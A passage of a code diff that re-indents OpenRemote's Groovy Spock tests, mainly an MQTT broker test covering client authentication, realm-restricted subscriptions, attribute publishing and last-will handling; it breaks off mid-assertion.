-        when: "Accessing valid index"
-        def polygon = multiPolygon.getPolygon(0)
+    when: "Accessing valid index"
+    def polygon = multiPolygon.getPolygon(0)
 
-        then: "Should return polygon"
-        assert polygon != null
-        assert polygon.size() == 1
+    then: "Should return polygon"
+    assert polygon != null
+    assert polygon.size() == 1
 
-        when: "Accessing invalid index"
-        multiPolygon.getPolygon(5)
+    when: "Accessing invalid index"
+    multiPolygon.getPolygon(5)
 
-        then: "Should throw exception"
-        thrown(IndexOutOfBoundsException)
-    }
+    then: "Should throw exception"
+    thrown(IndexOutOfBoundsException)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/mqtt/MqttBrokerTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/mqtt/MqttBrokerTest.groovy
@@ -63,838 +63,842 @@ import static org.openremote.model.value.ValueType.TEXT
 
 class MqttBrokerTest extends Specification implements ManagerContainerTrait {
 
-    def "Mqtt broker event test"() {
-        given: "the container environment is started"
-        List<SharedEvent> receivedEvents = new CopyOnWriteArrayList<>()
-        List<SharedEvent> restrictedReceivedEvents = new CopyOnWriteArrayList<>()
-        List<Object> receivedValues = new CopyOnWriteArrayList<>()
-        List<ConnectionStatus> clientConnectionStatuses = new CopyOnWriteArrayList<>()
-        MQTT_IOClient client = null
-        MQTT_IOClient newClient = null
-        def conditions = new PollingConditions(timeout: 15, initialDelay: 0.1, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def mqttBrokerService = container.getService(MQTTBrokerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find {it instanceof DefaultMQTTHandler} as DefaultMQTTHandler
-        def mqttClientId = UniqueIdentifierGenerator.generateId()
-        def username = keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username // realm and OAuth client id
-        def password = keycloakTestSetup.serviceUser.secret
-
-        def mqttHost = getString(container.getConfig(), MQTT_SERVER_LISTEN_HOST, "0.0.0.0")
-        def mqttPort = getInteger(container.getConfig(), MQTT_SERVER_LISTEN_PORT, 1883)
-
-        when: "a mqtt client connects with invalid credentials"
-        def wrongUsername = "master:" + keycloakTestSetup.serviceUser.username
-        client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(wrongUsername, password), null, null)
-        client.addConnectionStatusConsumer {clientConnectionStatuses.add(it)}
-        client.connect()
-
-        then: "the client should fail connection and retry"
-        conditions.eventually {
-           assert clientConnectionStatuses.contains(ConnectionStatus.CONNECTING)
-           assert clientConnectionStatuses.contains(ConnectionStatus.WAITING)
-        }
-
-        when: "the client disconnects"
-        client.disconnect()
-
-        then: "the status should be reported and reconnect cancelled"
-        conditions.eventually {
-           assert clientConnectionStatuses.contains(ConnectionStatus.DISCONNECTED)
-        }
-
-        when: "a mqtt client connects with valid credentials"
-        mqttClientId = UniqueIdentifierGenerator.generateId()
-        client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username, password), null, null)
-        client.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
-        }
-
-        when: "the client disconnects"
-        mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-        client.disconnect()
-
-        then: "the client resources should be freed"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
-        }
-
-        when: "a mqtt client connects with valid credentials"
-        List<String> subFailures = new CopyOnWriteArrayList<>()
-        mqttClientId = UniqueIdentifierGenerator.generateId()
-        client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username, password), null, null)
-        client.setTopicSubscribeFailureConsumer {subFailures.add(it)}
-        client.setRemoveConsumersOnSubscriptionFailure(true)
-        client.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
-        }
-
-        when: "a mqtt client subscribes to an asset in another realm"
-        def topic = "${keycloakTestSetup.realmCity.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.thingId".toString()
-        client.addMessageConsumer(topic, {msg -> })
-
-        then: "No subscription should exist"
-        conditions.eventually {
-            // A client re-subscribes its retained consumers whenever it reconnects, so failures can be reported more
-            // than once and the total count is not stable
-            assert subFailures.contains(topic)
-            assert client.topicConsumerMap.get(topic) == null // Consumer added and removed on failure
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "a mqtt client subscribes with clientId missing"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
-        client.addMessageConsumer(topic, {msg ->})
-
-        then: "No subscription should exist"
-        conditions.eventually {
-            assert subFailures.contains(topic)
-            assert client.topicConsumerMap.get(topic) == null // Consumer added and removed on failure
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "a mqtt client subscribes with different clientId"
-        def newClientId = UniqueIdentifierGenerator.generateId()
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
-        client.addMessageConsumer(topic, {msg ->})
-
-        then: "No subscription should exist"
-        conditions.eventually {
-            assert subFailures.contains(topic)
-            assert client.topicConsumerMap.get(topic) == null // Consumer added and removed on failure
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "a mqtt client subscribes to all attributes of an asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
-        Consumer<MQTTMessage<String>> eventConsumer = { msg ->
-            def event = ValueUtil.parse(msg.payload as String, SharedEvent.class)
-            receivedEvents.add(event.get())
-        }
-        client.addMessageConsumer(topic, eventConsumer)
-
-        then: "A subscription should exist"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) != null
-            assert client.topicConsumerMap.get(topic).consumers.size() == 1
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-        }
-
-        when: "An attribute event occurs for a subscribed attribute"
-        def attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 50)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "A publish event message should be sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 50
-        }
-        receivedEvents.clear()
-
-        when: "Another asset attribute changed the client is subscribed on"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", true)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "A second publish event message should be sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "presenceDetected"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(false) == true
-        }
-        receivedEvents.clear()
-
-        when: "a mqtt client publishes to an asset attribute"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/motionSensor/${managerTestSetup.apartment1HallwayId}".toString()
-        def payload = "70"
-        client.sendMessage(new MQTTMessage<String>(topic, payload))
-
-        then: "The value of the attribute should be updated and the client should have received the event"
-        new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
-            assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 70d
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 70d
-        }
-        receivedEvents.clear()
-
-        when: "a mqtt client publishes to an asset attribute"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/lights/${managerTestSetup.apartment1HallwayId}".toString()
-        payload = Boolean.FALSE.toString()
-        client.sendMessage(new MQTTMessage<String>(topic, payload))
-
-        then: "the value of the attribute should be updated and the client should have received the event"
-        conditions.eventually {
-            assert !assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("lights").get().value.orElse(true)
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "lights"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(true) == false
-        }
-        receivedEvents.clear()
-
-        when: "a mqtt client publishes to an asset attribute value"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/lights/$managerTestSetup.apartment1HallwayId".toString()
-        payload = ValueUtil.asJSON(true).orElse(null)
-        client.sendMessage(new MQTTMessage<String>(topic, payload))
-
-        then: "the value of the attribute should be updated and the client should have received the event"
-        conditions.eventually {
-            assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("lights").get().value.orElse(false)
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "lights"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(false) == true
-        }
-        receivedEvents.clear()
-
-        when: "a mqtt client unsubscribes from an asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
-        client.removeMessageConsumer(topic, eventConsumer)
-
-        then: "No subscription should exist"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) == null
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "another asset attribute changed without any subscriptions"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", false)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "No publish event message should be sent"
-        new PollingConditions(initialDelay: 1, delay: 1, timeout: 10).eventually {
-            assert receivedEvents.size() == 0
-        }
-
-        when: "a mqtt client subscribes to a specific asset attribute"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/motionSensor/$managerTestSetup.apartment1HallwayId".toString()
-        client.addMessageConsumer(topic, eventConsumer)
-
-        then: "the subscription should be created"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) != null
-            assert client.topicConsumerMap.get(topic).consumers.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-        }
-
-        when: "that attribute changes"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 30)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "a publish event message should be sent to the client"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 30
-        }
-        receivedEvents.clear()
-
-        when: "another asset attribute changed without any subscriptions on that attribute"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", true)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "no publish event message should be sent"
-        new PollingConditions(initialDelay: 1, delay: 1, timeout: 10).eventually {
-            assert receivedEvents.size() == 0
-        }
-
-        when: "a mqtt client unsubscribes from an asset attribute"
-        client.removeMessageConsumer(topic, eventConsumer)
-
-        then: "No subscription should exist"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) == null
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "a mqtt client subscribes to attributes for descendants of an asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
-        client.addMessageConsumer(topic, eventConsumer)
-
-        then: "a subscription should exist"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) != null
-            assert client.topicConsumerMap.get(topic).consumers.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-        }
-
-        when: "a child asset of the subscription attribute event occurs"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 40)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "a publish event message should be sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 40
-        }
-        receivedEvents.clear()
-
-        when: "a mqtt client subscribes to an asset attribute value"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC/motionSensor/$managerTestSetup.apartment1HallwayId".toString()
-        Consumer<MQTTMessage<String>> valueConsumer = { msg ->
-            receivedValues.add(msg.payload)
-        }
-        client.addMessageConsumer(topic, valueConsumer)
-
-        then: "the subscription should be created"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) != null
-            assert client.topicConsumerMap.get(topic).consumers.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
-        }
-
-        when: "a subscribed attribute changes"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 50)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "A publish value message should be sent to both subscriptions"
-        conditions.eventually {
-            assert receivedValues.size() == 1
-            assert receivedValues.get(0) == "50"
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 50
-        }
-        receivedEvents.clear()
-        receivedValues.clear()
-
-        when: "a subscribed attribute changes"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", false)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "only the wildcard subscription should have received a publish"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "presenceDetected"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(true) == false
-            assert receivedValues.size() == 0
-        }
-
-        when: "the client unsubscribes from the attribute value topic"
-        client.removeMessageConsumer(topic, valueConsumer)
-
-        then: "only one subscription should remain"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) == null
-            assert client.topicConsumerMap.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-        }
-
-        when: "a client disconnects"
-        client.disconnect()
-
-        then: "the client status should be disconnected"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 0
-        }
-
-        when: "the client reconnects"
-        receivedEvents.clear()
-        client.connect()
-
-        then: "the connection should exist and the previous subscription should be recreated"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert client.topicConsumerMap.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-        }
-
-        when: "a mqtt client subscribes to assets that are direct children of the realm"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ASSET_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD".toString()
-        client.addMessageConsumer(topic, eventConsumer)
-
-        then: "A subscription should exist"
-        conditions.eventually {
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
-        }
-
-        when: "an asset is updated with a new attribute"
-        def asset1 = assetStorageService.find(managerTestSetup.smartBuildingId)
-        asset1.addAttributes(new Attribute<>("temp", TEXT, "hello world"))
-        assetStorageService.merge(asset1)
-
-        then: "A publish event message should be sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AssetEvent
-            assert (receivedEvents.get(0) as AssetEvent).id == managerTestSetup.smartBuildingId
-            assert (receivedEvents.get(0) as AssetEvent).asset.attributes.get("temp") != null
-            assert (receivedEvents.get(0) as AssetEvent).asset.attributes.get("temp").flatMap(){it.getValue()}.orElse(null) == "hello world"
-        }
-        receivedEvents.clear()
-
-        when: "the client subscribes to descendant assets of a specific asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ASSET_TOPIC/$managerTestSetup.apartment1Id/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
-        client.addMessageConsumer(topic, eventConsumer)
-
-        then: "the subscription should exist"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) != null
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 3
-        }
-
-        when: "an asset is added as a descendant to the subscribed asset"
-        def childAsset = new ThingAsset("child")
-                .setParentId(managerTestSetup.apartment1LivingroomId)
-                .setRealm(managerTestSetup.realmBuildingName)
-        childAsset = assetStorageService.merge(childAsset)
-
-        then: "another event should be sent"
-        conditions.eventually {
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AssetEvent
-            assert (receivedEvents.get(0) as AssetEvent).id == childAsset.id
-            assert (receivedEvents.get(0) as AssetEvent).assetName == childAsset.name
-        }
-        receivedEvents.clear()
-
-        when: "the mqtt client unsubscribes from the multilevel topic"
-        client.removeMessageConsumer(topic, eventConsumer)
-
-        then: "only two subscriptions should be left"
-        conditions.eventually {
-            assert client.topicConsumerMap.get(topic) == null
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
-        }
-
-        when: "the descendant asset is modified"
-        childAsset.addAttributes(new Attribute<>("temp2", TEXT))
-        childAsset = assetStorageService.merge(childAsset)
-
-        then: "A publish event message should not be sent"
-        new PollingConditions(initialDelay: 1, delay: 1, timeout: 10).eventually {
-            assert receivedEvents.size() == 0
-        }
-
-        when: "another client connects with a last will configured to write to an attribute"
-        newClientId = "newClient"
-        def username2 = keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser2.username // realm and OAuth client id
-        def password2 = keycloakTestSetup.serviceUser2.secret
-        newClient = new MQTT_IOClient(newClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username2, password2), null, new MQTTLastWill("${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/motionSensor/$managerTestSetup.apartment1HallwayId".toString(), "1000", false))
-        newClient.connect()
-
-        then: "the client should be connected"
-        conditions.eventually {
-            assert newClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-        }
-
-        when: "the new client publishes to an attribute topic"
-        receivedEvents.clear()
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/motionSensor/${managerTestSetup.apartment1HallwayId}".toString()
-        payload = "170"
-        newClient.sendMessage(new MQTTMessage<String>(topic, payload))
-
-        then: "The value of the attribute should be updated and the first client should have received the event"
-        new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
-            assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 170d
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 170d
-        }
-        receivedEvents.clear()
-
-        and: "the new client gets abruptly disconnected"
-        widenDisconnectedConnectionWindow(mqttBrokerService)
-        def existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-//        ((NioSocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).config().setOption(ChannelOption.SO_LINGER, 0I)
-        ((SocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)newClient.client).clientConfig).delegate).connectionConfig.get()).channel).close()
-
-        then: "the client should reconnect"
-        conditions.eventually {
-            assert !mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
-        }
-
-        and: "The last will message should have updated the value of the attribute and the first client should have received the event"
-        // The client reconnecting does not mean the broker has processed the closed session yet, and publishing the
-        // last will of that session is what triggers the update, so allow well beyond the reconnect for it
-        new PollingConditions(initialDelay: 1, timeout: 30, delay: 1).eventually {
-            assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 1000d
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 1000d
-        }
-
-        when: "the new client tries to publish again with a specified timestamp"
-        def specifiedTimestamp = (receivedEvents.get(0) as AttributeEvent).timestamp + 5
-        receivedEvents.clear()
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_WRITE_TOPIC/motionSensor/${managerTestSetup.apartment1HallwayId}".toString()
-        payload = "{\"value\": 170, \"timestamp\": ${specifiedTimestamp}}".toString()
-        newClient.sendMessage(new MQTTMessage<String>(topic, payload))
-
-        then: "The value of the attribute should be updated and the first client should have received the event"
-        new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
-            assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 170d
-            assert receivedEvents.size() == 1
-            assert receivedEvents.get(0) instanceof AttributeEvent
-            assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
-            assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
-            assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 170d
-            assert (receivedEvents.get(0) as AttributeEvent).timestamp == specifiedTimestamp
-        }
-        receivedEvents.clear()
-
-        when: "the new client disconnects"
-        newClient.disconnect()
-
-        then: "the status should show as disconnected"
-        conditions.eventually {
-            assert newClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
-        }
-
-        when: "the new client reconnects using a last will topic for an unauthorised asset/attribute"
-        def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId)
-        def currentCO2Level = asset.getAttribute("co2Level").flatMap{it.getValue()}.orElse(0d)
-        newClient = new MQTT_IOClient(newClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username2, password2), null, new MQTTLastWill("${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/co2Level/$managerTestSetup.apartment2LivingroomId".toString(), "1000", false))
-        newClient.setTopicSubscribeFailureConsumer {subFailures.add(it)}
-        newClient.connect()
-
-        then: "the client should be connected"
-        conditions.eventually {
-            assert newClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-        }
-
-        when: "the new client gets abruptly disconnected"
-        existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-//        ((NioSocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)device1Client.client).clientConfig).delegate).connectionConfig.get()).channel).config().setOption(ChannelOption.SO_LINGER, 0I)
-        ((SocketChannel)((MqttClientConnectionConfig)((MqttClientConfig)((Mqtt3ClientConfigView)((Mqtt3AsyncClientView)newClient.client).clientConfig).delegate).connectionConfig.get()).channel).close()
-
-        then: "the client should reconnect"
-        conditions.eventually {
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
-        }
-
-        then: "The last will message should not have updated the value of the attribute"
-        new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
-            def asst = assetStorageService.find(managerTestSetup.apartment2LivingroomId)
